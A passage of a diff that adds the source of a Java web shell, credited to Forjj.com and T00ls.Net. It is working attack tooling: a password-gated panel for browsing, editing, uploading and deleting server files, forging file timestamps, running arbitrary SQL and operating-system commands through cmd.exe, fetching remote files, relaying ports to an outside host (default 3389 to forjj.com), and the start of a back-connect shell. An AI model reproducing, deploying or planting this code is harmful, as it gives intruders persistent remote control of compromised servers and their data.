    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2009 NinTy www.Forjj.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = 